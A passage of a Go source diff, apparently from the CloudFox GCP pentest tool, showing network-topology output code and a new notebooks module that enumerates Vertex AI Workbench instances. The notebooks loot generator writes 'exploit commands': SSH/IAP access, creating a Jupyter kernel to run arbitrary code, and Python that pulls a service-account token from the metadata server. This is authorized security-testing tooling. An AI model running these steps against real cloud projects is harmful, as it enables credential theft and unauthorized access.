	sb.WriteString(fmt.Sprintf("│ %-42s │ %-42s │\n", "[SHARED VPC HOST] = Shared VPC host project", "◄══► = Peering connection"))
	sb.WriteString(fmt.Sprintf("│ %-42s │ %-42s │\n", "Import/Export = Route exchange settings", "▼ = Traffic flow direction"))
	sb.WriteString("└")
	sb.WriteString(strings.Repeat("─", width-2))
	sb.WriteString("┘\n")

	return sb.String()
}

// min returns the minimum of two integers.
// NOTE(review): shadows the Go 1.21+ builtin; kept for older toolchains.
func min(a, b int) int {
	if a < b {
		return a
	}
	return b
}

// max returns the maximum of two integers.
// NOTE(review): shadows the Go 1.21+ builtin; kept for older toolchains.
func max(a, b int) int {
	if a > b {
		return a
	}
	return b
}

// ------------------------------
// Loot File Management
// ------------------------------

// addNetworkToLoot appends gcloud enumeration commands for one VPC network
// to the project's loot file. No-op if the loot file was never initialized.
func (m *NetworkTopologyModule) addNetworkToLoot(projectID string, n VPCNetwork) {
	lootFile := m.LootMap[projectID]["network-topology-commands"]
	if lootFile == nil {
		return
	}
	lootFile.Contents += fmt.Sprintf(
		"# =============================================================================\n"+
			"# VPC NETWORK: %s\n"+
			"# =============================================================================\n"+
			"# Project: %s\n\n"+
			"# === ENUMERATION COMMANDS ===\n\n"+
			"# Describe network:\n"+
			"gcloud compute networks describe %s --project=%s\n\n"+
			"# List subnets in network:\n"+
			"gcloud compute networks subnets list --network=%s --project=%s\n\n"+
			"# List firewall rules for network:\n"+
			"gcloud compute firewall-rules list --filter=\"network:%s\" --project=%s\n\n",
		n.Name,
		n.ProjectID,
		n.Name, n.ProjectID,
		n.Name, n.ProjectID,
		n.Name, n.ProjectID,
	)
}

// addSubnetToLoot appends gcloud enumeration commands for one subnet to the
// project's loot file. No-op if the loot file was never initialized.
func (m *NetworkTopologyModule) addSubnetToLoot(projectID string, s Subnet) {
	lootFile := m.LootMap[projectID]["network-topology-commands"]
	if lootFile == nil {
		return
	}
	lootFile.Contents += fmt.Sprintf(
		"# -----------------------------------------------------------------------------\n"+
			"# SUBNET: %s\n"+
			"# -----------------------------------------------------------------------------\n"+
			"# Project: %s, Region: %s\n\n"+
			"# === ENUMERATION COMMANDS ===\n\n"+
			"# Describe subnet:\n"+
			"gcloud compute networks subnets describe %s --region=%s --project=%s\n\n"+
			"# Get subnet IAM policy:\n"+
			"gcloud compute networks subnets get-iam-policy %s --region=%s --project=%s\n\n",
		s.Name,
		s.ProjectID, s.Region,
		s.Name, s.Region, s.ProjectID,
		s.Name, s.Region, s.ProjectID,
	)
}

// addPeeringToLoot appends gcloud enumeration commands for one VPC peering
// to the project's loot file. No-op if the loot file was never initialized.
func (m *NetworkTopologyModule) addPeeringToLoot(projectID string, p VPCPeering) {
	lootFile := m.LootMap[projectID]["network-topology-commands"]
	if lootFile == nil {
		return
	}
lootFile.Contents += fmt.Sprintf( + "# =============================================================================\n"+ + "# VPC PEERING: %s\n"+ + "# =============================================================================\n"+ + "# Project: %s\n"+ + "# Local: %s -> Peer: %s (project: %s)\n\n"+ + "# === ENUMERATION COMMANDS ===\n\n"+ + "# List peerings:\n"+ + "gcloud compute networks peerings list --project=%s\n\n"+ + "# List peering routes (incoming):\n"+ + "gcloud compute networks peerings list-routes %s --project=%s --network=%s --region=REGION --direction=INCOMING\n\n"+ + "# List peering routes (outgoing):\n"+ + "gcloud compute networks peerings list-routes %s --project=%s --network=%s --region=REGION --direction=OUTGOING\n\n", + p.Name, + p.ProjectID, + m.extractNetworkName(p.Network), m.extractNetworkName(p.PeerNetwork), p.PeerProjectID, + p.ProjectID, + p.Name, p.ProjectID, m.extractNetworkName(p.Network), + p.Name, p.ProjectID, m.extractNetworkName(p.Network), + ) +} + +func (m *NetworkTopologyModule) addNATToLoot(projectID string, nat CloudNATConfig) { + lootFile := m.LootMap[projectID]["network-topology-commands"] + if lootFile == nil { + return + } + lootFile.Contents += fmt.Sprintf( + "# -----------------------------------------------------------------------------\n"+ + "# CLOUD NAT: %s\n"+ + "# -----------------------------------------------------------------------------\n"+ + "# Project: %s, Region: %s\n\n"+ + "# === ENUMERATION COMMANDS ===\n\n"+ + "# Describe router with NAT config:\n"+ + "gcloud compute routers describe ROUTER_NAME --region=%s --project=%s\n\n"+ + "# List NAT mappings:\n"+ + "gcloud compute routers get-nat-mapping-info ROUTER_NAME --region=%s --project=%s\n\n", + nat.Name, + nat.ProjectID, nat.Region, + nat.Region, nat.ProjectID, + nat.Region, nat.ProjectID, + ) +} + +func (m *NetworkTopologyModule) addSharedVPCToLoot(projectID string, config *SharedVPCConfig) { + lootFile := m.LootMap[projectID]["network-topology-commands"] + 
if lootFile == nil { + return + } + lootFile.Contents += fmt.Sprintf( + "# =============================================================================\n"+ + "# SHARED VPC HOST: %s\n"+ + "# =============================================================================\n"+ + "# Service Projects: %v\n\n"+ + "# === ENUMERATION COMMANDS ===\n\n"+ + "# List Shared VPC resources:\n"+ + "gcloud compute shared-vpc list-associated-resources %s\n\n"+ + "# Get host project for service project:\n"+ + "gcloud compute shared-vpc get-host-project SERVICE_PROJECT_ID\n\n"+ + "# List usable subnets for service project:\n"+ + "gcloud compute networks subnets list-usable --project=%s\n\n", + projectID, + config.ServiceProjects, + projectID, + projectID, + ) +} + +// ------------------------------ +// Output Generation +// ------------------------------ +func (m *NetworkTopologyModule) writeOutput(ctx context.Context, logger internal.Logger) { + // Generate ASCII diagram and add to loot + diagram := m.generateASCIIDiagram() + if diagram != "" { + // Add diagram to the first project's loot (or create a combined one) + for projectID := range m.LootMap { + if m.LootMap[projectID] == nil { + m.LootMap[projectID] = make(map[string]*internal.LootFile) + } + m.LootMap[projectID]["network-topology-diagram"] = &internal.LootFile{ + Name: "network-topology-diagram", + Contents: diagram, + } + break // Only add once for flat output; hierarchical will duplicate + } + + // For hierarchical output, add to all projects so it appears in each + if m.Hierarchy != nil && !m.FlatOutput { + for projectID := range m.LootMap { + if m.LootMap[projectID] == nil { + m.LootMap[projectID] = make(map[string]*internal.LootFile) + } + m.LootMap[projectID]["network-topology-diagram"] = &internal.LootFile{ + Name: "network-topology-diagram", + Contents: diagram, + } + } + } + } + + if m.Hierarchy != nil && !m.FlatOutput { + m.writeHierarchicalOutput(ctx, logger) + } else { + m.writeFlatOutput(ctx, logger) + } +} + 
+func (m *NetworkTopologyModule) getNetworksHeader() []string { + return []string{ + "Project Name", + "Project ID", + "Network", + "Routing Mode", + "Subnets", + "Peerings", + "Shared VPC", + "MTU", + } +} + +func (m *NetworkTopologyModule) getSubnetsHeader() []string { + return []string{ + "Project", + "Subnet", + "Network", + "Region", + "CIDR", + "Private Google Access", + "Flow Logs", + "Purpose", + "IAM Binding Role", + "IAM Binding Principal", + } +} + +func (m *NetworkTopologyModule) getPeeringsHeader() []string { + return []string{ + "Project Name", + "Project ID", + "Name", + "Local Network", + "Peer Network", + "Peer Project", + "State", + "Import Routes", + "Export Routes", + } +} + +func (m *NetworkTopologyModule) getNATHeader() []string { + return []string{ + "Project Name", + "Project ID", + "Name", + "Region", + "Network", + "NAT IPs", + "Logging", + } +} + +func (m *NetworkTopologyModule) networksToTableBody(networks []VPCNetwork) [][]string { + var body [][]string + for _, n := range networks { + sharedVPC := "-" + if n.IsSharedVPC { + sharedVPC = n.SharedVPCRole + } + + body = append(body, []string{ + m.GetProjectName(n.ProjectID), + n.ProjectID, + n.Name, + n.RoutingMode, + fmt.Sprintf("%d", n.SubnetCount), + fmt.Sprintf("%d", n.PeeringCount), + sharedVPC, + fmt.Sprintf("%d", n.MTU), + }) + } + return body +} + +func (m *NetworkTopologyModule) subnetsToTableBody(subnets []Subnet) [][]string { + var body [][]string + for _, s := range subnets { + purpose := s.Purpose + if purpose == "" { + purpose = "PRIVATE" + } + + if len(s.IAMBindings) > 0 { + // One row per IAM binding + for _, binding := range s.IAMBindings { + body = append(body, []string{ + m.GetProjectName(s.ProjectID), + s.Name, + m.extractNetworkName(s.Network), + s.Region, + s.IPCIDRRange, + shared.BoolToYesNo(s.PrivateIPGoogleAccess), + shared.BoolToYesNo(s.FlowLogsEnabled), + purpose, + binding.Role, + binding.Member, + }) + } + } else { + // No IAM bindings - single row + body = 
append(body, []string{ + m.GetProjectName(s.ProjectID), + s.Name, + m.extractNetworkName(s.Network), + s.Region, + s.IPCIDRRange, + shared.BoolToYesNo(s.PrivateIPGoogleAccess), + shared.BoolToYesNo(s.FlowLogsEnabled), + purpose, + "-", + "-", + }) + } + } + return body +} + +func (m *NetworkTopologyModule) peeringsToTableBody(peerings []VPCPeering) [][]string { + var body [][]string + for _, p := range peerings { + body = append(body, []string{ + m.GetProjectName(p.ProjectID), + p.ProjectID, + p.Name, + m.extractNetworkName(p.Network), + m.extractNetworkName(p.PeerNetwork), + p.PeerProjectID, + p.State, + shared.BoolToYesNo(p.ImportCustomRoute), + shared.BoolToYesNo(p.ExportCustomRoute), + }) + } + return body +} + +func (m *NetworkTopologyModule) natsToTableBody(nats []CloudNATConfig) [][]string { + var body [][]string + for _, nat := range nats { + natIPs := strings.Join(nat.NATIPAddresses, ", ") + if natIPs == "" { + natIPs = "AUTO" + } + + body = append(body, []string{ + m.GetProjectName(nat.ProjectID), + nat.ProjectID, + nat.Name, + nat.Region, + m.extractNetworkName(nat.Network), + natIPs, + shared.BoolToYesNo(nat.EnableLogging), + }) + } + return body +} + +func (m *NetworkTopologyModule) buildTablesForProject(projectID string) []internal.TableFile { + var tableFiles []internal.TableFile + + if networks, ok := m.ProjectNetworks[projectID]; ok && len(networks) > 0 { + sort.Slice(networks, func(i, j int) bool { + return networks[i].Name < networks[j].Name + }) + tableFiles = append(tableFiles, internal.TableFile{ + Name: "vpc-networks", + Header: m.getNetworksHeader(), + Body: m.networksToTableBody(networks), + }) + for _, n := range networks { + m.addNetworkToLoot(projectID, n) + } + } + + if subnets, ok := m.ProjectSubnets[projectID]; ok && len(subnets) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: "subnets", + Header: m.getSubnetsHeader(), + Body: m.subnetsToTableBody(subnets), + }) + for _, s := range subnets { + 
m.addSubnetToLoot(projectID, s) + } + } + + if peerings, ok := m.ProjectPeerings[projectID]; ok && len(peerings) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: "vpc-peerings", + Header: m.getPeeringsHeader(), + Body: m.peeringsToTableBody(peerings), + }) + for _, p := range peerings { + m.addPeeringToLoot(projectID, p) + } + } + + if nats, ok := m.ProjectNATs[projectID]; ok && len(nats) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: "cloud-nat", + Header: m.getNATHeader(), + Body: m.natsToTableBody(nats), + }) + for _, nat := range nats { + m.addNATToLoot(projectID, nat) + } + } + + // Add Shared VPC loot if this is a host project + if config, ok := m.SharedVPCs[projectID]; ok { + m.addSharedVPCToLoot(projectID, config) + } + + return tableFiles +} + +func (m *NetworkTopologyModule) writeHierarchicalOutput(ctx context.Context, logger internal.Logger) { + outputData := internal.HierarchicalOutputData{ + OrgLevelData: make(map[string]internal.CloudfoxOutput), + ProjectLevelData: make(map[string]internal.CloudfoxOutput), + } + + // Collect all project IDs that have data + projectsWithData := make(map[string]bool) + for projectID := range m.ProjectNetworks { + projectsWithData[projectID] = true + } + for projectID := range m.ProjectSubnets { + projectsWithData[projectID] = true + } + for projectID := range m.ProjectPeerings { + projectsWithData[projectID] = true + } + for projectID := range m.ProjectNATs { + projectsWithData[projectID] = true + } + + for projectID := range projectsWithData { + tableFiles := m.buildTablesForProject(projectID) + + var lootFiles []internal.LootFile + if projectLoot, ok := m.LootMap[projectID]; ok { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + } + + outputData.ProjectLevelData[projectID] = NetworkTopologyOutput{Table: 
tableFiles, Loot: lootFiles} + } + + pathBuilder := m.BuildPathBuilder() + + err := internal.HandleHierarchicalOutputSmart("gcp", m.Format, m.Verbosity, m.WrapTable, pathBuilder, outputData) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing hierarchical output: %v", err), GCP_NETWORKTOPOLOGY_MODULE_NAME) + } +} + +func (m *NetworkTopologyModule) writeFlatOutput(ctx context.Context, logger internal.Logger) { + allNetworks := m.getAllNetworks() + allSubnets := m.getAllSubnets() + allPeerings := m.getAllPeerings() + allNATs := m.getAllNATs() + + sort.Slice(allNetworks, func(i, j int) bool { + if allNetworks[i].ProjectID != allNetworks[j].ProjectID { + return allNetworks[i].ProjectID < allNetworks[j].ProjectID + } + return allNetworks[i].Name < allNetworks[j].Name + }) + + var tables []internal.TableFile + + if len(allNetworks) > 0 { + tables = append(tables, internal.TableFile{ + Name: "vpc-networks", + Header: m.getNetworksHeader(), + Body: m.networksToTableBody(allNetworks), + }) + } + + if len(allSubnets) > 0 { + tables = append(tables, internal.TableFile{ + Name: "subnets", + Header: m.getSubnetsHeader(), + Body: m.subnetsToTableBody(allSubnets), + }) + } + + if len(allPeerings) > 0 { + tables = append(tables, internal.TableFile{ + Name: "vpc-peerings", + Header: m.getPeeringsHeader(), + Body: m.peeringsToTableBody(allPeerings), + }) + } + + if len(allNATs) > 0 { + tables = append(tables, internal.TableFile{ + Name: "cloud-nat", + Header: m.getNATHeader(), + Body: m.natsToTableBody(allNATs), + }) + } + + // Populate loot for flat output + for projectID, networks := range m.ProjectNetworks { + for _, n := range networks { + m.addNetworkToLoot(projectID, n) + } + } + for projectID, subnets := range m.ProjectSubnets { + for _, s := range subnets { + m.addSubnetToLoot(projectID, s) + } + } + for projectID, peerings := range m.ProjectPeerings { + for _, p := range peerings { + m.addPeeringToLoot(projectID, p) + } + } + for projectID, nats := range 
m.ProjectNATs { + for _, nat := range nats { + m.addNATToLoot(projectID, nat) + } + } + for projectID, config := range m.SharedVPCs { + m.addSharedVPCToLoot(projectID, config) + } + + var lootFiles []internal.LootFile + for _, projectLoot := range m.LootMap { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + } + + output := NetworkTopologyOutput{ + Table: tables, + Loot: lootFiles, + } + + scopeNames := make([]string, len(m.ProjectIDs)) + for i, projectID := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(projectID) + } + + err := internal.HandleOutputSmart( + "gcp", + m.Format, + m.OutputDirectory, + m.Verbosity, + m.WrapTable, + "project", + m.ProjectIDs, + scopeNames, + m.Account, + output, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), GCP_NETWORKTOPOLOGY_MODULE_NAME) + m.CommandCounter.Error++ + } +} diff --git a/gcp/commands/notebooks.go b/gcp/commands/notebooks.go new file mode 100644 index 00000000..26076d0b --- /dev/null +++ b/gcp/commands/notebooks.go @@ -0,0 +1,504 @@ +package commands + +import ( + "github.com/BishopFox/cloudfox/gcp/shared" + "context" + "fmt" + "strings" + "sync" + + notebooksservice "github.com/BishopFox/cloudfox/gcp/services/notebooksService" + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" +) + +var GCPNotebooksCommand = &cobra.Command{ + Use: globals.GCP_NOTEBOOKS_MODULE_NAME, + Aliases: []string{"nb", "jupyter", "workbench"}, + Short: "Enumerate Vertex AI Workbench notebooks", + Long: `Enumerate Vertex AI Workbench and legacy notebook instances. 
+ +Features: +- Lists all notebook instances across locations +- Shows service account configuration +- Identifies public IP exposure +- Checks for GPU attachments +- Analyzes proxy access settings`, + Run: runGCPNotebooksCommand, +} + +type NotebooksModule struct { + gcpinternal.BaseGCPModule + ProjectInstances map[string][]notebooksservice.NotebookInstanceInfo // projectID -> instances + ProjectRuntimes map[string][]notebooksservice.RuntimeInfo // projectID -> runtimes + LootMap map[string]map[string]*internal.LootFile // projectID -> loot files + FoxMapperCache *gcpinternal.FoxMapperCache // Cached FoxMapper attack path analysis results + mu sync.Mutex +} + +type NotebooksOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o NotebooksOutput) TableFiles() []internal.TableFile { return o.Table } +func (o NotebooksOutput) LootFiles() []internal.LootFile { return o.Loot } + +func runGCPNotebooksCommand(cmd *cobra.Command, args []string) { + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_NOTEBOOKS_MODULE_NAME) + if err != nil { + return + } + + module := &NotebooksModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + ProjectInstances: make(map[string][]notebooksservice.NotebookInstanceInfo), + ProjectRuntimes: make(map[string][]notebooksservice.RuntimeInfo), + LootMap: make(map[string]map[string]*internal.LootFile), + } + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +func (m *NotebooksModule) Execute(ctx context.Context, logger internal.Logger) { + // Get FoxMapper cache from context + m.FoxMapperCache = gcpinternal.GetFoxMapperCacheFromContext(ctx) + + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_NOTEBOOKS_MODULE_NAME, m.processProject) + + allInstances := m.getAllInstances() + allRuntimes := m.getAllRuntimes() + + if len(allInstances) == 0 && len(allRuntimes) == 0 { + logger.InfoM("No notebook instances found", globals.GCP_NOTEBOOKS_MODULE_NAME) + return + } + + publicCount := 0 + 
for _, instance := range allInstances { + if !instance.NoPublicIP { + publicCount++ + } + } + + logger.SuccessM(fmt.Sprintf("Found %d notebook instance(s) (%d with public IP), %d runtime(s)", + len(allInstances), publicCount, len(allRuntimes)), globals.GCP_NOTEBOOKS_MODULE_NAME) + m.writeOutput(ctx, logger) +} + +func (m *NotebooksModule) getAllInstances() []notebooksservice.NotebookInstanceInfo { + var all []notebooksservice.NotebookInstanceInfo + for _, instances := range m.ProjectInstances { + all = append(all, instances...) + } + return all +} + +func (m *NotebooksModule) getAllRuntimes() []notebooksservice.RuntimeInfo { + var all []notebooksservice.RuntimeInfo + for _, runtimes := range m.ProjectRuntimes { + all = append(all, runtimes...) + } + return all +} + +func (m *NotebooksModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Enumerating notebooks in project: %s", projectID), globals.GCP_NOTEBOOKS_MODULE_NAME) + } + + svc := notebooksservice.New() + + m.mu.Lock() + // Initialize loot for this project + if m.LootMap[projectID] == nil { + m.LootMap[projectID] = make(map[string]*internal.LootFile) + m.LootMap[projectID]["notebooks-commands"] = &internal.LootFile{ + Name: "notebooks-commands", + Contents: "# Notebook Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + } + } + m.mu.Unlock() + + // Get instances + instances, err := svc.ListInstances(projectID) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_NOTEBOOKS_MODULE_NAME, + fmt.Sprintf("Could not list notebook instances in project %s", projectID)) + } else { + m.mu.Lock() + m.ProjectInstances[projectID] = instances + for _, instance := range instances { + m.addToLoot(projectID, instance) + } + m.mu.Unlock() + } + + // Get runtimes (might not be available in all projects) + runtimes, err := 
svc.ListRuntimes(projectID) + if err != nil { + // Don't increment error counter - runtimes API may not be enabled + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Could not list runtimes in project %s (may not be enabled)", projectID), globals.GCP_NOTEBOOKS_MODULE_NAME) + } + } else { + m.mu.Lock() + m.ProjectRuntimes[projectID] = runtimes + m.mu.Unlock() + } +} + +func (m *NotebooksModule) addToLoot(projectID string, instance notebooksservice.NotebookInstanceInfo) { + lootFile := m.LootMap[projectID]["notebooks-commands"] + if lootFile == nil { + return + } + lootFile.Contents += fmt.Sprintf( + "# =============================================================================\n"+ + "# NOTEBOOK: %s\n"+ + "# =============================================================================\n"+ + "# Project: %s, Location: %s\n"+ + "# State: %s, Service Account: %s\n"+ + "# Public IP: %s, Proxy Access: %s\n", + instance.Name, + instance.ProjectID, instance.Location, + instance.State, instance.ServiceAccount, + shared.BoolToYesNo(!instance.NoPublicIP), shared.BoolToYesNo(!instance.NoProxyAccess), + ) + + if instance.ProxyUri != "" { + lootFile.Contents += fmt.Sprintf( + "# Proxy URI: %s\n", instance.ProxyUri) + } + + lootFile.Contents += fmt.Sprintf(` +# === ENUMERATION COMMANDS === + +# Describe instance: +gcloud notebooks instances describe %s --location=%s --project=%s + +# Get JupyterLab proxy URL: +gcloud notebooks instances describe %s --location=%s --project=%s --format='value(proxyUri)' + +# Start instance (if stopped): +gcloud notebooks instances start %s --location=%s --project=%s + +# Stop instance: +gcloud notebooks instances stop %s --location=%s --project=%s + +# Get instance metadata (service account, network config): +gcloud notebooks instances describe %s --location=%s --project=%s --format=json | jq '{serviceAccount: .serviceAccount, network: .network, subnet: .subnet}' + +`, + instance.Name, instance.Location, 
instance.ProjectID, + instance.Name, instance.Location, instance.ProjectID, + instance.Name, instance.Location, instance.ProjectID, + instance.Name, instance.Location, instance.ProjectID, + instance.Name, instance.Location, instance.ProjectID, + ) + + // === EXPLOIT COMMANDS === + lootFile.Contents += "# === EXPLOIT COMMANDS ===\n\n" + + // SSH to notebook instance + if !instance.NoPublicIP { + lootFile.Contents += fmt.Sprintf( + "# SSH to notebook instance (runs as SA: %s):\n"+ + "gcloud compute ssh --project=%s --zone=%s notebook-instance-%s\n\n", + instance.ServiceAccount, + instance.ProjectID, instance.Location, instance.Name, + ) + } + lootFile.Contents += fmt.Sprintf( + "# SSH through IAP (if direct SSH blocked or no public IP):\n"+ + "gcloud compute ssh notebook-instance-%s --tunnel-through-iap --project=%s --zone=%s\n\n", + instance.Name, instance.ProjectID, instance.Location, + ) + + // JupyterLab code execution + if instance.ProxyUri != "" { + lootFile.Contents += fmt.Sprintf( + "# Execute code via Jupyter API (runs as SA: %s):\n"+ + "# Access JupyterLab: %s\n\n"+ + "# Create and execute a notebook via Jupyter REST API:\n"+ + "# Step 1: Get Jupyter token (via proxy auth)\n"+ + "# Step 2: Execute arbitrary code:\n"+ + "curl -X POST '%s/api/kernels' -H 'Content-Type: application/json' -d '{\"name\": \"python3\"}'\n\n"+ + "# Execute Python code to steal SA token:\n"+ + "# In JupyterLab terminal or notebook cell:\n"+ + "# import requests\n"+ + "# r = requests.get('http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token', headers={'Metadata-Flavor': 'Google'})\n"+ + "# print(r.json())\n\n", + instance.ServiceAccount, + instance.ProxyUri, + instance.ProxyUri, + ) + } else { + lootFile.Contents += fmt.Sprintf( + "# Start instance to get Jupyter proxy URL, then execute code as SA: %s\n"+ + "gcloud notebooks instances start %s --location=%s --project=%s\n\n", + instance.ServiceAccount, + instance.Name, instance.Location, 
instance.ProjectID, + ) + } + + // Upload notebook with code execution + lootFile.Contents += fmt.Sprintf( + "# Register an instance (Vertex AI Workbench):\n"+ + "gcloud notebooks instances register %s --location=%s --project=%s\n\n", + instance.Name, instance.Location, instance.ProjectID, + ) +} + +func (m *NotebooksModule) writeOutput(ctx context.Context, logger internal.Logger) { + if m.Hierarchy != nil && !m.FlatOutput { + m.writeHierarchicalOutput(ctx, logger) + } else { + m.writeFlatOutput(ctx, logger) + } +} + +func (m *NotebooksModule) getInstancesHeader() []string { + return []string{ + "Project Name", + "Project ID", + "Name", + "Location", + "State", + "Machine Type", + "Service Account", + "SA Attack Paths", + "Network", + "Subnet", + "Public IP", + "Proxy Access", + "Proxy URI", + "GPU", + "Creator", + } +} + +func (m *NotebooksModule) getRuntimesHeader() []string { + return []string{ + "Project Name", + "Project ID", + "Name", + "Location", + "State", + "Type", + "Machine Type", + "Service Account", + "SA Attack Paths", + "Network", + "Subnet", + } +} + +func (m *NotebooksModule) instancesToTableBody(instances []notebooksservice.NotebookInstanceInfo) [][]string { + var body [][]string + for _, instance := range instances { + gpu := "-" + if instance.AcceleratorCount > 0 { + gpu = fmt.Sprintf("%s x%d", instance.AcceleratorType, instance.AcceleratorCount) + } + sa := instance.ServiceAccount + if sa == "" { + sa = "(default)" + } + + // Check attack paths (privesc/exfil/lateral) for the service account + attackPaths := "run foxmapper" + if m.FoxMapperCache != nil && m.FoxMapperCache.IsPopulated() { + if sa != "(default)" && sa != "" { + attackPaths = gcpinternal.GetAttackSummaryFromCaches(m.FoxMapperCache, nil, sa) + } else { + attackPaths = "No" + } + } + + network := instance.Network + if network == "" { + network = "-" + } + subnet := instance.Subnet + if subnet == "" { + subnet = "-" + } + proxyUri := instance.ProxyUri + if proxyUri == "" { + 
proxyUri = "-" + } + creator := instance.Creator + if creator == "" { + creator = "-" + } + body = append(body, []string{ + m.GetProjectName(instance.ProjectID), + instance.ProjectID, + instance.Name, + instance.Location, + instance.State, + instance.MachineType, + sa, + attackPaths, + network, + subnet, + shared.BoolToYesNo(!instance.NoPublicIP), + shared.BoolToYesNo(!instance.NoProxyAccess), + proxyUri, + gpu, + creator, + }) + } + return body +} + +func (m *NotebooksModule) runtimesToTableBody(runtimes []notebooksservice.RuntimeInfo) [][]string { + var body [][]string + for _, runtime := range runtimes { + sa := runtime.ServiceAccount + if sa == "" { + sa = "-" + } + + // Check attack paths (privesc/exfil/lateral) for the service account + attackPaths := "run foxmapper" + if m.FoxMapperCache != nil && m.FoxMapperCache.IsPopulated() { + if sa != "-" && sa != "" { + attackPaths = gcpinternal.GetAttackSummaryFromCaches(m.FoxMapperCache, nil, sa) + } else { + attackPaths = "No" + } + } + + network := runtime.Network + if network == "" { + network = "-" + } + subnet := runtime.Subnet + if subnet == "" { + subnet = "-" + } + body = append(body, []string{ + m.GetProjectName(runtime.ProjectID), + runtime.ProjectID, + runtime.Name, + runtime.Location, + runtime.State, + runtime.RuntimeType, + runtime.MachineType, + sa, + attackPaths, + network, + subnet, + }) + } + return body +} + +func (m *NotebooksModule) buildTablesForProject(projectID string) []internal.TableFile { + var tableFiles []internal.TableFile + + if instances, ok := m.ProjectInstances[projectID]; ok && len(instances) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: "notebook-instances", + Header: m.getInstancesHeader(), + Body: m.instancesToTableBody(instances), + }) + } + + if runtimes, ok := m.ProjectRuntimes[projectID]; ok && len(runtimes) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: "notebook-runtimes", + Header: m.getRuntimesHeader(), + Body: 
m.runtimesToTableBody(runtimes), + }) + } + + return tableFiles +} + +func (m *NotebooksModule) writeHierarchicalOutput(ctx context.Context, logger internal.Logger) { + outputData := internal.HierarchicalOutputData{ + OrgLevelData: make(map[string]internal.CloudfoxOutput), + ProjectLevelData: make(map[string]internal.CloudfoxOutput), + } + + // Get all project IDs that have data + projectIDs := make(map[string]bool) + for projectID := range m.ProjectInstances { + projectIDs[projectID] = true + } + for projectID := range m.ProjectRuntimes { + projectIDs[projectID] = true + } + + for projectID := range projectIDs { + tableFiles := m.buildTablesForProject(projectID) + + var lootFiles []internal.LootFile + if projectLoot, ok := m.LootMap[projectID]; ok { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + } + + outputData.ProjectLevelData[projectID] = NotebooksOutput{Table: tableFiles, Loot: lootFiles} + } + + pathBuilder := m.BuildPathBuilder() + + err := internal.HandleHierarchicalOutputSmart("gcp", m.Format, m.Verbosity, m.WrapTable, pathBuilder, outputData) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing hierarchical output: %v", err), globals.GCP_NOTEBOOKS_MODULE_NAME) + } +} + +func (m *NotebooksModule) writeFlatOutput(ctx context.Context, logger internal.Logger) { + allInstances := m.getAllInstances() + allRuntimes := m.getAllRuntimes() + + var tables []internal.TableFile + + if len(allInstances) > 0 { + tables = append(tables, internal.TableFile{ + Name: "notebook-instances", + Header: m.getInstancesHeader(), + Body: m.instancesToTableBody(allInstances), + }) + } + + if len(allRuntimes) > 0 { + tables = append(tables, internal.TableFile{ + Name: "notebook-runtimes", + Header: m.getRuntimesHeader(), + Body: m.runtimesToTableBody(allRuntimes), + }) + } + + var lootFiles 
[]internal.LootFile + for _, projectLoot := range m.LootMap { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + } + + output := NotebooksOutput{Table: tables, Loot: lootFiles} + + scopeNames := make([]string, len(m.ProjectIDs)) + for i, id := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(id) + } + + err := internal.HandleOutputSmart("gcp", m.Format, m.OutputDirectory, m.Verbosity, m.WrapTable, + "project", m.ProjectIDs, scopeNames, m.Account, output) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_NOTEBOOKS_MODULE_NAME) + } +} diff --git a/gcp/commands/organizations.go b/gcp/commands/organizations.go new file mode 100755 index 00000000..c8682be7 --- /dev/null +++ b/gcp/commands/organizations.go @@ -0,0 +1,961 @@ +package commands + +import ( + "context" + "fmt" + "strings" + + orgsservice "github.com/BishopFox/cloudfox/gcp/services/organizationsService" + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" +) + +var GCPOrganizationsCommand = &cobra.Command{ + Use: globals.GCP_ORGANIZATIONS_MODULE_NAME, + Aliases: []string{"org", "orgs", "hierarchy"}, + Short: "Enumerate GCP organization hierarchy", + Long: `Enumerate GCP organization, folder, and project hierarchy. 
